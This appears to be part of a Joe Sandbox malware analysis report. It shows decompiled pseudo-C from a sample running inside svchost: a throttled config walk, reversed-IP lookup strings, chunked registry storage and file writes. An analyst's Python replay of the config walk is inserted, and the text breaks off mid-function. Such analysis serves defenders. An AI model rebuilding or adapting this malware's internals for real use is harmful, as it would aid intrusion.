                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000011.00000002.527823849.0000000002510000.00000040.00000400.00020000.00000000.sdmp, Offset: 02510000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_17_2_2510000_svchost.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: lstrlen$lstrcmpi
                                                                                                                                  • String ID: localcfg
                                                                                                                                  • API String ID: 1808961391-1857712256
                                                                                                                                  • Opcode ID: bba383d6e2fa0158c626cd8dc3d31dc825cc2cb5121a70f0ab7a94479f897969
                                                                                                                                  • Instruction ID: 978fa5fdd9236ebb0c9d4b9cb5029932843096da052559e898e18c5042f71e1f
                                                                                                                                  • Opcode Fuzzy Hash: bba383d6e2fa0158c626cd8dc3d31dc825cc2cb5121a70f0ab7a94479f897969
                                                                                                                                  • Instruction Fuzzy Hash: 6F011A31601228AFDF11EF69CC819DE7BA9FF44354B01C425ED59D7200E370EA54CA98
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 72%
                                                                                                                                  			E02518CEE() {
                                                                                                                                  				intOrPtr* _v8;
                                                                                                                                  				intOrPtr _v12;
                                                                                                                                  				long _t15;
                                                                                                                                  				char _t17;
                                                                                                                                  				intOrPtr _t19;
                                                                                                                                  				intOrPtr* _t20;
                                                                                                                                  				void* _t25;
                                                                                                                                  				signed int _t31;
                                                                                                                                  				signed char _t35;
                                                                                                                                  				signed int _t36;
                                                                                                                                  				char* _t41;
                                                                                                                                  				intOrPtr* _t42;
                                                                                                                                  				signed int _t45;
                                                                                                                                  				void* _t49;
                                                                                                                                  
                                                                                                                                  				_push(_t34);
                                                                                                                                  				_t31 = 0;
                                                                                                                                  				_t49 =  *0x2523380 - _t31; // 0x0
                                                                                                                                  				if(_t49 == 0) {
                                                                                                                                  					L17:
                                                                                                                                  					return _t15;
                                                                                                                                  				}
                                                                                                                                  				_t15 = GetTickCount() -  *0x2523388; // ms since the last completed walk; the timestamp is refreshed at L16
                                                                                                                                  				if(_t15 < 0xea60) { // 0xea60 = 60000 ms: the walk below runs at most once per minute
                                                                                                                                  					goto L17;
                                                                                                                                  				}
                                                                                                                                  				_t41 =  *0x2523380; // 0x0 -- config blob: [0] entry count, [1..4] flag dword, [5..] 5-byte entries
                                                                                                                                  				_t17 =  *_t41; // entry count (signed char; a value <= 0 skips the loop)
                                                                                                                                  				_t45 =  *(_t41 + 1); // flag bits tested per entry below
                                                                                                                                  				_t42 = _t41 + 5; // first entry
                                                                                                                                  				_v12 = _t17;
                                                                                                                                  				if(_t17 <= 0) {
                                                                                                                                  					L16:
                                                                                                                                  					_t15 = GetTickCount();
                                                                                                                                  					 *0x2523388 = _t15;
                                                                                                                                  					goto L17;
                                                                                                                                  				} else {
                                                                                                                                  					_v8 = _t42;
                                                                                                                                  					do {
                                                                                                                                  						_t35 =  *_v8; // first byte of the entry: its id
                                                                                                                                  						if(_t35 != 8) {
                                                                                                                                  							if(_t35 != 9) {
                                                                                                                                  								_t36 = _t35;
                                                                                                                                  								_t19 =  *((intOrPtr*)(0x2523300 + _t36 * 4)); // pointer table at 0x2523300 indexed by entry id
                                                                                                                                  								if(_t19 == 0) {
                                                                                                                                  									goto L12;
                                                                                                                                  								}
                                                                                                                                  								_t9 = _t19 + 0x34; // 0x3b10c483 -- the object's own id at +0x34 must equal the slot index
                                                                                                                                  								if(_t36 ==  *_t9) {
                                                                                                                                  									_t13 = _t19 + 0x50; // 0x7486850 -- optional callback at +0x50
                                                                                                                                  									_t20 =  *_t13;
                                                                                                                                  									if(_t20 != 0) {
                                                                                                                                  										 *_t20(_t45 >>  *(_t31 * 5 + _t42) & 0x00000001); // arg = (flags >> id) & 1; *(_t31*5 + _t42) is the same id byte as _t35
                                                                                                                                  									}
                                                                                                                                  									goto L16;
                                                                                                                                  								}
                                                                                                                                  								goto L12;
                                                                                                                                  							}
                                                                                                                                  							_t25 = E0251A688(_t45 >> _t35 & 0x00000001); // id 9 handler, arg = (flags >> 9) & 1
                                                                                                                                  							L8:
                                                                                                                                  							if(_t25 != 0) {
                                                                                                                                  								_t6 = _v8 + 1; // 0x3cc6 -- the entry's dword
                                                                                                                                  								_t45 = _t45 |  *_t6; // nonzero handler result: OR it into the flags seen by later entries
                                                                                                                                  							}
                                                                                                                                  							goto L12;
                                                                                                                                  						}
                                                                                                                                  						_t25 = E0251A677(_t45 >> _t35 & 0x00000001); // id 8 handler, arg = (flags >> 8) & 1
                                                                                                                                  						goto L8;
                                                                                                                                  						L12:
                                                                                                                                  						_v8 = _v8 + 5; // advance to the next 5-byte entry
                                                                                                                                  						_t31 = _t31 + 1;
                                                                                                                                  					} while (_t31 < _v12);
                                                                                                                                  					goto L16;
                                                                                                                                  				}
                                                                                                                                  			}
                                                                                                                                  Instruction addresses for the statements above, in order (the report's per-line address column, flattened by extraction; 0x00000000 is shown where the decompiler assigns a line no address):
                                                                                                                                  0x02518cf2 0x02518cf4 0x02518cf6 0x02518cfc 0x02518dae 0x02518db0 0x02518db0 0x02518d08
                                                                                                                                  0x02518d13 0x00000000 0x00000000 0x02518d1b 0x02518d21 0x02518d24 0x02518d27 0x02518d2a
                                                                                                                                  0x02518d2f 0x02518da1 0x02518da1 0x02518da8 0x00000000 0x02518d31 0x02518d31 0x02518d34
                                                                                                                                  0x02518d37 0x02518d3c 0x02518d50 0x02518d6c 0x02518d6f 0x02518d78 0x00000000 0x00000000
                                                                                                                                  0x02518d7a 0x02518d7d 0x02518d8b 0x02518d8b 0x02518d90 0x02518d9e 0x02518da0 0x00000000
                                                                                                                                  0x02518d90 0x00000000 0x02518d7d 0x02518d5a 0x02518d5f 0x02518d62 0x02518d67 0x02518d67
                                                                                                                                  0x02518d67 0x00000000 0x02518d62 0x02518d46 0x00000000 0x02518d7f 0x02518d7f 0x02518d83
                                                                                                                                  0x02518d84 0x00000000 0x02518d89
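The following is an analyst's reimplementation of the config walk that E02518CEE performs, added here as an example; it is not code from the sample or from the report. The blob layout (count byte, flag dword, then 5-byte id/value entries), the one-minute gate, the id 8 / id 9 special cases and the callback-at-+0x50 dispatch are read directly from the pseudo-C above; the field names, the handler stand-ins for E0251A677 / E0251A688, the plugin-table model and the sample blob are constructed assumptions.

```python
"""Replay of the E02518CEE config walk against a constructed blob.

Assumed layout of the buffer at 0x2523380 (names are the analyst's, not the sample's):
    [0]    int8    entry count
    [1:5]  uint32  flag bits (little-endian)
    [5:]   count x 5-byte entries: [id:uint8][value:uint32]
"""
import struct
from typing import Callable, Dict, List, Optional, Tuple

THROTTLE_MS = 0xEA60  # 60000 ms, the GetTickCount() gate at the top of E02518CEE
ENTRY_SIZE = 5        # the loop advances _v8 by 5 per iteration


def throttle_elapsed(now_ms: int, last_ms: int) -> bool:
    """Mirror `GetTickCount() - *0x2523388 < 0xea60` as a 32-bit unsigned delta.

    Assumption: the compare is unsigned; the pseudo-C types the delta as `long`
    without showing the jump condition, so this is the analyst's reading.
    """
    return ((now_ms - last_ms) & 0xFFFFFFFF) >= THROTTLE_MS


def parse_blob(blob: bytes) -> Tuple[int, List[Tuple[int, int]]]:
    """Split the blob into (flags, [(id, value), ...]) using the assumed layout."""
    count = struct.unpack_from("<b", blob, 0)[0]   # signed: `if(_t17 <= 0)` skips the loop
    flags = struct.unpack_from("<I", blob, 1)[0]   # _t45 = *(_t41 + 1)
    entries = []
    for i in range(max(count, 0)):
        off = 5 + ENTRY_SIZE * i                   # _t42 = _t41 + 5, then _v8 += 5
        ident = blob[off]                          # _t35 = *_v8
        value = struct.unpack_from("<I", blob, off + 1)[0]   # *(_v8 + 1)
        entries.append((ident, value))
    return flags, entries


def bit_for(flags: int, ident: int) -> int:
    """`_t45 >> _t35 & 1`; x86 SHR masks the shift count to 5 bits, which the pseudo-C hides."""
    return (flags >> (ident & 31)) & 1


Handler = Callable[[int], object]
Plugin = Tuple[int, Optional[Handler]]   # (value at plugin+0x34, callback at plugin+0x50)


def walk_config(blob: bytes,
                builtin: Dict[int, Handler],
                plugins: Dict[int, Plugin]) -> Tuple[List[Tuple[int, int, str]], int]:
    """Replay the loop in E02518CEE; return (trace of (id, bit, action), final flags).

    builtin maps ids 8 and 9 to stand-ins for E0251A677 / E0251A688 (truthy = "applied");
    plugins maps an id to the table slot at 0x2523300 + id*4 (None = empty slot).
    """
    flags, entries = parse_blob(blob)
    trace: List[Tuple[int, int, str]] = []
    for ident, value in entries:
        bit = bit_for(flags, ident)
        if ident in (8, 9):
            # A nonzero handler result ORs the entry's dword into the working flags,
            # so an early entry can switch on bits that later entries test.
            if builtin[ident](bit):
                flags |= value
                trace.append((ident, bit, "flags|=0x%08x" % value))
            else:
                trace.append((ident, bit, "unchanged"))
            continue
        slot = plugins.get(ident)
        if slot is None:
            trace.append((ident, bit, "no plugin"))           # *(0x2523300 + id*4) == 0
            continue
        declared_id, callback = slot
        if declared_id != ident:
            trace.append((ident, bit, "plugin id mismatch"))  # *(plugin + 0x34) != id
            continue
        if callback is not None:
            callback(bit)
        trace.append((ident, bit, "plugin callback, walk stops"))
        break   # goto L16: timestamp refreshed, remaining entries skipped
    return trace, flags


# Constructed sample blob (not taken from the sample): 4 entries, flags with only bit 8 set.
SAMPLE_BLOB = (
    bytes([4])
    + struct.pack("<I", 0x00000100)
    + bytes([8]) + struct.pack("<I", 0x00000200)   # id 8: handler ORs in bit 9
    + bytes([9]) + struct.pack("<I", 0x00000010)   # id 9: now sees bit 9 set
    + bytes([3]) + struct.pack("<I", 0xDEADBEEF)   # id 3: plugin slot, ends the walk
    + bytes([4]) + struct.pack("<I", 0xFFFFFFFF)   # never reached
)


def demo() -> Tuple[List[Tuple[int, int, str]], int]:
    """Handlers that 'apply' only when their bit is set; plugin 3 just records its argument."""
    seen: List[int] = []
    builtin = {8: lambda bit: bit == 1, 9: lambda bit: bit == 1}
    plugins = {3: (3, seen.append)}
    return walk_config(SAMPLE_BLOB, builtin, plugins)
```

The point worth noticing when triaging a captured blob is the ordering dependency: because a successful id 8 / id 9 entry rewrites the flag word in place, the bit a later entry tests depends on which earlier entries "succeeded", and the first matching plugin entry ends the walk, so entries after it are dead until the next pass a minute later.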

                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000011.00000002.527823849.0000000002510000.00000040.00000400.00020000.00000000.sdmp, Offset: 02510000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_17_2_2510000_svchost.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CountTick
                                                                                                                                  • String ID: 0 v$localcfg
                                                                                                                                  • API String ID: 536389180-2166502722
                                                                                                                                  • Opcode ID: d69835de5f6421f47679afc906bbb1c330a575833eb7414b2782c3ca7486f58f
                                                                                                                                  • Instruction ID: 2e151c821f0d598d3d8df96e298c3371b6cae48d9fa1a66758780671d330e971
                                                                                                                                  • Opcode Fuzzy Hash: d69835de5f6421f47679afc906bbb1c330a575833eb7414b2782c3ca7486f58f
                                                                                                                                  • Instruction Fuzzy Hash: F521C332A10715AFFB309F74D98866A7BB9FF61254B2A04D9D401D7141CB34E948CB58
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  • Type = %d: works = %d cur_thr = %d num_thr = %d integr = %d integr_nl = %d fCntrl = %d time_ok_filt = %d cntr = %d time_nl_filt = %d last_time_work = %d last_time_getem = %d last_time_calc = %d last_time_nl, xrefs: 0251C057
                                                                                                                                  • 0 v, xrefs: 0251BFD0
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000011.00000002.527823849.0000000002510000.00000040.00000400.00020000.00000000.sdmp, Offset: 02510000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_17_2_2510000_svchost.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CountTickwsprintf
                                                                                                                                  • String ID: Type = %d: works = %d cur_thr = %d num_thr = %d integr = %d integr_nl = %d fCntrl = %d time_ok_filt = %d cntr = %d time_nl_filt = %d last_time_work = %d last_time_getem = %d last_time_calc = %d last_time_nl$0 v
                                                                                                                                  • API String ID: 2424974917-2279882658
                                                                                                                                  • Opcode ID: 50e7fa82caab7af27740539f7d705722911cddba1042fe96d16e1be89c0e11ac
                                                                                                                                  • Instruction ID: 40cc7f654947e467dc522e581ec8699a676a9075e181151f590f8a9a22d51e50
                                                                                                                                  • Opcode Fuzzy Hash: 50e7fa82caab7af27740539f7d705722911cddba1042fe96d16e1be89c0e11ac
                                                                                                                                  • Instruction Fuzzy Hash: BA11B672101100EFDB529EA9CD44E567FA6FB88318B34819CF2188A166D633C827EB50
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                  			E02511C5F(void* __eflags) {
                                                                                                                                  				signed int _t49;
                                                                                                                                  				signed int _t51;
                                                                                                                                  				void* _t80;
                                                                                                                                  				char _t91;
                                                                                                                                  				void* _t92;
                                                                                                                                  				signed int _t98;
                                                                                                                                  				void* _t101;
                                                                                                                                  				void* _t102;
                                                                                                                                  				void* _t103;
                                                                                                                                  				void* _t105;
                                                                                                                                  				void* _t107;
                                                                                                                                  				void* _t108;
                                                                                                                                  
                                                                                                                                  				_t105 = _t107 - 0x70;
                                                                                                                                  				_t108 = _t107 - 0x114;
                                                                                                                                  				 *(_t105 + 0x6c) =  *(_t105 + 0x6c) & 0x00000000;
                                                                                                                                  				_t98 =  *(_t105 + 0x7c);
                                                                                                                                  				 *(_t105 + 0x7c) =  *(_t105 + 0x7c) & 0x00000000;
                                                                                                                                  				_t101 = E0251ED03(_t98, 0x2c); // 0x2c = ','
                                                                                                                                  				if(_t101 == 0) {
                                                                                                                                  					L6:
                                                                                                                                  					_t49 = _t98;
                                                                                                                                  					_t32 = _t49 + 1; // 0x2
                                                                                                                                  					_t102 = _t32;
                                                                                                                                  					do {
                                                                                                                                  						_t91 =  *_t49;
                                                                                                                                  						_t49 = _t49 + 1;
                                                                                                                                  					} while (_t91 != 0);
                                                                                                                                  					 *((char*)(_t105 + _t49 - _t102 - 0x24)) = _t91;
                                                                                                                                  					_t51 = _t98;
                                                                                                                                  					_t35 = _t51 + 1; // 0x2
                                                                                                                                  					_t103 = _t35;
                                                                                                                                  					do {
                                                                                                                                  						_t92 =  *_t51;
                                                                                                                                  						_t51 = _t51 + 1;
                                                                                                                                  					} while (_t92 != 0);
                                                                                                                                  					E0251EE5C(_t105 - 0x24, _t98, _t51 - _t103);
                                                                                                                                  					wsprintfA(_t105 - 0xa4, "%u.%u.%u.%u.%s",  *(_t105 + 0x7b) & 0x000000ff,  *(_t105 + 0x7a) & 0x000000ff,  *(_t105 + 0x79) & 0x000000ff,  *(_t105 + 0x78) & 0x000000ff, _t105 - 0x24);
                                                                                                                                  					if(E02512684(_t105 - 0xa4) != 0) {
                                                                                                                                  						 *(_t105 + 0x6c) =  *(_t105 + 0x6c) | 1 <<  *(_t105 + 0x7c);
                                                                                                                                  					}
                                                                                                                                  					L12:
                                                                                                                                  					return  *(_t105 + 0x6c);
                                                                                                                                  				}
                                                                                                                                  				 *(_t105 + 0x5c) =  *(_t105 + 0x78) & 0x000000ff;
                                                                                                                                  				 *(_t105 + 0x60) =  *(_t105 + 0x79) & 0x000000ff;
                                                                                                                                  				 *(_t105 + 0x68) =  *(_t105 + 0x7a) & 0x000000ff;
                                                                                                                                  				 *(_t105 + 0x64) =  *(_t105 + 0x7b) & 0x000000ff;
                                                                                                                                  				while(1) {
                                                                                                                                  					 *((char*)(_t105 + _t101 - _t98 - 0x24)) = 0;
                                                                                                                                  					E0251EE5C(_t105 - 0x24, _t98, _t101 - _t98);
                                                                                                                                  					_t22 = _t101 + 1; // 0x1
                                                                                                                                  					_t98 = _t22;
                                                                                                                                  					wsprintfA(_t105 - 0xa4, "%u.%u.%u.%u.%s",  *(_t105 + 0x64),  *(_t105 + 0x68),  *(_t105 + 0x60),  *(_t105 + 0x5c), _t105 - 0x24);
                                                                                                                                  					_t80 = E02512684(_t105 - 0xa4);
                                                                                                                                  					_t108 = _t108 + 0x2c;
                                                                                                                                  					if(_t80 != 0) {
                                                                                                                                  						 *(_t105 + 0x6c) =  *(_t105 + 0x6c) | 1 <<  *(_t105 + 0x7c);
                                                                                                                                  					}
                                                                                                                                  					 *(_t105 + 0x7c) =  *(_t105 + 0x7c) + 1;
                                                                                                                                  					if( *(_t105 + 0x7c) > 0x1e) {
                                                                                                                                  						goto L12;
                                                                                                                                  					}
                                                                                                                                  					_t101 = E0251ED03(_t98, 0x2c);
                                                                                                                                  					if(_t101 != 0) {
                                                                                                                                  						continue;
                                                                                                                                  					}
                                                                                                                                  					goto L6;
                                                                                                                                  				}
                                                                                                                                  				goto L12;
                                                                                                                                  			}

                                                                                                                                   Instruction addresses (address column of the decompiled function above, one entry per statement): 0x02511c60, 0x02511c64, 0x02511c6a, 0x02511c71, 0x02511c74, 0x02511c86, 0x02511c8c, 0x02511d1c, 0x02511d1c, 0x02511d1e, 0x02511d1e, 0x02511d21, 0x02511d21, 0x02511d23, 0x02511d24, 0x02511d2a, 0x02511d2e, 0x02511d30, 0x02511d30, 0x02511d33, 0x02511d33, 0x02511d35, 0x02511d36, 0x02511d42, 0x02511d6b, 0x02511d7e, 0x02511d88, 0x02511d88, 0x02511d8b, 0x02511d95, 0x02511d95, 0x02511c96, 0x02511c9d, 0x02511ca4, 0x02511cab, 0x02511cae, 0x02511cb3, 0x02511cbd, 0x02511cd2, 0x02511cd2, 0x02511ce1, 0x02511cea, 0x02511cef, 0x02511cf4, 0x02511cfe, 0x02511cfe, 0x02511d04, 0x02511d0a, 0x00000000, 0x00000000, 0x02511d14, 0x02511d1a, 0x00000000, 0x00000000, 0x00000000, 0x02511d1a, 0x00000000

                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000011.00000002.527823849.0000000002510000.00000040.00000400.00020000.00000000.sdmp, Offset: 02510000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_17_2_2510000_svchost.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: wsprintf
                                                                                                                                  • String ID: %u.%u.%u.%u.%s$localcfg
                                                                                                                                  • API String ID: 2111968516-120809033
                                                                                                                                  • Opcode ID: e7d4e6d02ddbfff0b8f28135245d309732f34f8464b6ad17688f960faf03137b
                                                                                                                                  • Instruction ID: 333b550b46d9ed5bb7f581cd7c956d0ba4db0444bfcc62ab3ce60902ee431edc
                                                                                                                                  • Opcode Fuzzy Hash: e7d4e6d02ddbfff0b8f28135245d309732f34f8464b6ad17688f960faf03137b
                                                                                                                                  • Instruction Fuzzy Hash: 31418B729042999FEB21CF788D44BEE3FE9AF49310F240156FEA4D3181D634DA05CBA4
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                  			E0251E654(intOrPtr _a4, intOrPtr _a8, CHAR* _a12) {
                                                                                                                                  				intOrPtr _t30;
                                                                                                                                  				CHAR* _t31;
                                                                                                                                  				int _t34;
                                                                                                                                  				intOrPtr* _t41;
                                                                                                                                  				intOrPtr* _t42;
                                                                                                                                  				void* _t47;
                                                                                                                                  				intOrPtr _t51;
                                                                                                                                  				int _t52;
                                                                                                                                  				void* _t53;
                                                                                                                                  				intOrPtr _t54;
                                                                                                                                  				void* _t55;
                                                                                                                                  				char _t59;
                                                                                                                                  
                                                                                                                                  				E0251DD05();
                                                                                                                                  				_t41 = 0x25220e8;
                                                                                                                                  				_t55 =  *0x25220e8 - 0x25220e8; // 0x2a1f068
                                                                                                                                  				if(_t55 == 0) {
                                                                                                                                  					L9:
                                                                                                                                  					_t53 = E0251EBCC(0x1c);
                                                                                                                                  					if(_t53 != 0) {
                                                                                                                                  						 *((intOrPtr*)(_t53 + 0x18)) = _a4;
                                                                                                                                  						 *((intOrPtr*)(_t53 + 4)) = _a8;
                                                                                                                                  						E02513E8F(0x25220e8, _t53);
                                                                                                                                  						__eflags = _a12;
                                                                                                                                  						if(_a12 == 0) {
                                                                                                                                  							 *(_t53 + 8) = 0;
                                                                                                                                  						} else {
                                                                                                                                  							_t15 = _t53 + 8; // 0x8
                                                                                                                                  							lstrcpynA(_t15, _a12, 0xf);
                                                                                                                                  							 *((char*)(_t53 + 0x17)) = 0;
                                                                                                                                  						}
                                                                                                                                  						L15:
                                                                                                                                  						_t42 = 0x25220e4;
                                                                                                                                  						__eflags =  *0x25220e4 - _t42; // 0x2a05278
                                                                                                                                  						if(__eflags == 0) {
                                                                                                                                  							L22:
                                                                                                                                  							_t47 = 1;
                                                                                                                                  							L11:
                                                                                                                                  							E0251DD69();
                                                                                                                                  							return _t47;
                                                                                                                                  						} else {
                                                                                                                                  							goto L16;
                                                                                                                                  						}
                                                                                                                                  						do {
                                                                                                                                  							L16:
                                                                                                                                  							_t30 =  *((intOrPtr*)(_t53 + 4));
                                                                                                                                  							_t51 =  *_t42;
                                                                                                                                  							__eflags = _t30 - 0xffffffff;
                                                                                                                                  							if(_t30 == 0xffffffff) {
                                                                                                                                  								L18:
                                                                                                                                  								_t20 = _t53 + 8; // 0x8
                                                                                                                                  								_t31 = _t20;
                                                                                                                                  								__eflags =  *_t31;
                                                                                                                                  								if( *_t31 == 0) {
                                                                                                                                  									L20:
                                                                                                                                  									_t52 = _t51 + 0xc;
                                                                                                                                  									__eflags = _t52;
                                                                                                                                  									 *((intOrPtr*)(_t53 + 0x18))(_t52, 1);
                                                                                                                                  									goto L21;
                                                                                                                                  								}
                                                                                                                                  								_t21 = _t51 + 0x10; // 0x25220f8
                                                                                                                                  								_t34 = lstrcmpA(_t21, _t31);
                                                                                                                                  								__eflags = _t34;
                                                                                                                                  								if(_t34 != 0) {
                                                                                                                                  									goto L21;
                                                                                                                                  								}
                                                                                                                                  								goto L20;
                                                                                                                                  							}
                                                                                                                                  							__eflags =  *(_t51 + 0xc) - _t30;
                                                                                                                                  							if( *(_t51 + 0xc) != _t30) {
								goto L21;
							}
							goto L18;
							L21:
							_t42 =  *_t42;
							__eflags =  *_t42 - 0x25220e4;
						} while ( *_t42 != 0x25220e4);
						goto L22;
					}
					_t47 = 0;
					goto L11;
				} else {
					goto L1;
				}
				do {
					L1:
					_t54 =  *_t41;
					if( *((intOrPtr*)(_t54 + 0x18)) == _a4 &&  *((intOrPtr*)(_t54 + 4)) == _a8) {
						if(_a12 != 0) {
							_t8 = _t54 + 8; // 0x761b43e8
							__eflags = lstrcmpA(_t8, _a12);
						} else {
							_t59 =  *(_t54 + 8);
						}
						if(_t59 == 0) {
							break;
						} else {
							goto L7;
						}
					}
					L7:
					_t41 =  *_t41;
					_t53 = 0;
				} while ( *_t41 != 0x25220e8);
				if(_t53 != 0) {
					goto L15;
				}
				goto L9;
			}

APIs
  • Part of subcall function 0251DD05: GetTickCount.KERNEL32 ref: 0251DD0F
  • Part of subcall function 0251DD05: InterlockedExchange.KERNEL32(025236B4,00000001), ref: 0251DD44
  • Part of subcall function 0251DD05: GetCurrentThreadId.KERNEL32 ref: 0251DD53
• lstrcmpA.KERNEL32(761B43E8,00000000,?,761B43E0,00000000,?,02515EC1), ref: 0251E693
• lstrcpynA.KERNEL32(00000008,00000000,0000000F,?,761B43E0,00000000,?,02515EC1), ref: 0251E6E9
• lstrcmpA.KERNEL32(89ABCDEF,00000008,?,761B43E0,00000000,?,02515EC1), ref: 0251E722
Strings
Memory Dump Source
• Source File: 00000011.00000002.527823849.0000000002510000.00000040.00000400.00020000.00000000.sdmp, Offset: 02510000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_2510000_svchost.jbxd
Yara matches
Similarity
• API ID: lstrcmp$CountCurrentExchangeInterlockedThreadTicklstrcpyn
• String ID: 89ABCDEF
• API String ID: 3343386518-71641322
• Opcode ID: 7c80f0e8c5dc92ee978be163f562ea6916d69298b61538daf5d1bf125291f932
• Instruction ID: d9a1d53dbc5822a758e1543cf8ec3ff9af9a3cc65a2ed2706ab774864afdaaee
• Opcode Fuzzy Hash: 7c80f0e8c5dc92ee978be163f562ea6916d69298b61538daf5d1bf125291f932
• Instruction Fuzzy Hash: A331EF31A00352DFFB318F60E885BA77BE4BF06324F54482AED458B581D770E888CB88
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
			E0251E095(void* _a4, char* _a8, intOrPtr* _a12, char* _a16, int _a20) {
				int _v8;
				char* _v12;
				void* _v16;
				char _v48;
				intOrPtr* _t34;
				int _t50;
				void* _t52;
				intOrPtr _t53;
				int _t57;
				int _t58;
				void* _t59;
				void* _t60;
				void* _t61;

				_t57 = 0;
				if(RegCreateKeyExA(_a4, _a8, 0, 0, 0, 0x20106, 0,  &_v16, 0) != 0) {
					return 0;
				}
				_v12 = _a16;
				_t34 = _a12;
				_t52 = _t34 + 1;
				do {
					_t53 =  *_t34;
					_t34 = _t34 + 1;
				} while (_t53 != 0);
				_t55 = _t34 - _t52;
				_v8 = 0;
				if(_t34 - _t52 > 0x1c) {
					_t55 = 0x1c;
				}
				E0251EE08( &_v48, _a12, _t55);
				_t50 = _a20;
				_t61 = _t60 + 0xc;
				if(_t50 <= _t57) {
					L11:
					E0251F1ED(_v8, _t59 + _t55 - 0x2c, 0xa);
					RegDeleteValueA(_v16,  &_v48);
					RegCloseKey(_v16);
					return 0 | _t50 == _t57;
				} else {
					while(1) {
						_t58 = 0xff000;
						if(_t50 < 0xff000) {
							_t58 = _t50;
						}
						E0251F1ED(_v8, _t59 + _t55 - 0x2c, 0xa);
						_t61 = _t61 + 0xc;
						if(RegSetValueExA(_v16,  &_v48, 0, 3, _v12, _t58) != 0) {
							break;
						}
						_v12 =  &(_v12[_t58]);
						_t50 = _t50 - _t58;
						_v8 = _v8 + 1;
						if(_t50 > 0) {
							continue;
						}
						break;
					}
					_t57 = 0;
					goto L11;
				}
			}

                                                                                                                                  0x0251e158
                                                                                                                                  0x0251e161
                                                                                                                                  0x00000000
                                                                                                                                  0x0251e0fb
                                                                                                                                  0x0251e0fb
                                                                                                                                  0x0251e0fb
                                                                                                                                  0x0251e102
                                                                                                                                  0x0251e104
                                                                                                                                  0x0251e104
                                                                                                                                  0x0251e110
                                                                                                                                  0x0251e115
                                                                                                                                  0x0251e12f
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0251e131
                                                                                                                                  0x0251e134
                                                                                                                                  0x0251e136
                                                                                                                                  0x0251e13b
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0251e13b
                                                                                                                                  0x0251e13d
                                                                                                                                  0x00000000
                                                                                                                                  0x0251e13d

                                                                                                                                  APIs
                                                                                                                                  • RegCreateKeyExA.ADVAPI32(80000001,0251E2A3,00000000,00000000,00000000,00020106,00000000,0251E2A3,00000000,000000E4), ref: 0251E0B2
                                                                                                                                  • RegSetValueExA.ADVAPI32(0251E2A3,?,00000000,00000003,80000001,000FF000,?,?,?,?,000000C8,025222F8), ref: 0251E127
                                                                                                                                  • RegDeleteValueA.ADVAPI32(0251E2A3,?,?,?,?,?,000000C8,025222F8), ref: 0251E158
                                                                                                                                  • RegCloseKey.ADVAPI32(0251E2A3,?,?,?,?,000000C8,025222F8,?,?,?,?,?,?,?,?,0251E2A3), ref: 0251E161
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000011.00000002.527823849.0000000002510000.00000040.00000400.00020000.00000000.sdmp, Offset: 02510000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_17_2_2510000_svchost.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Value$CloseCreateDelete
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2667537340-0
                                                                                                                                  • Opcode ID: 397c4b81a92c8660da1f8496a9e9e92a9e92b9734b61d803f90d8799e692c6a6
                                                                                                                                  • Instruction ID: 7c9a0e75d72783625c029eaafe73fafd593a98334e0f2609041fd1118f595f42
                                                                                                                                  • Opcode Fuzzy Hash: 397c4b81a92c8660da1f8496a9e9e92a9e92b9734b61d803f90d8799e692c6a6
                                                                                                                                  • Instruction Fuzzy Hash: 0C213E71E40219BBEF219EA4DC89EEE7FB9EF09750F404061FD04A6150E7718A58DB94
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                  			E02513F18(void* _a4, void* _a8, long _a12, long _a16, long _a20) {
                                                                                                                                  				struct _OVERLAPPED _v24;
                                                                                                                                  				long _t30;
                                                                                                                                  				void* _t31;
                                                                                                                                  
                                                                                                                                  				_v24.Offset = _v24.Offset & 0x00000000;
                                                                                                                                  				_v24.OffsetHigh = _v24.OffsetHigh & 0x00000000;
                                                                                                                                  				_t30 = _a12;
                                                                                                                                  				_t31 = _a16;
                                                                                                                                  				_a16 = _a16 & 0x00000000;
                                                                                                                                  				_v24.hEvent = _t31;
                                                                                                                                  				if(WriteFile(_a4, _a8, _t30,  &_a16,  &_v24) != 0) {
                                                                                                                                  					L3:
                                                                                                                                  					if(_t30 != _a16) {
                                                                                                                                  						L5:
                                                                                                                                  						return 0;
                                                                                                                                  					}
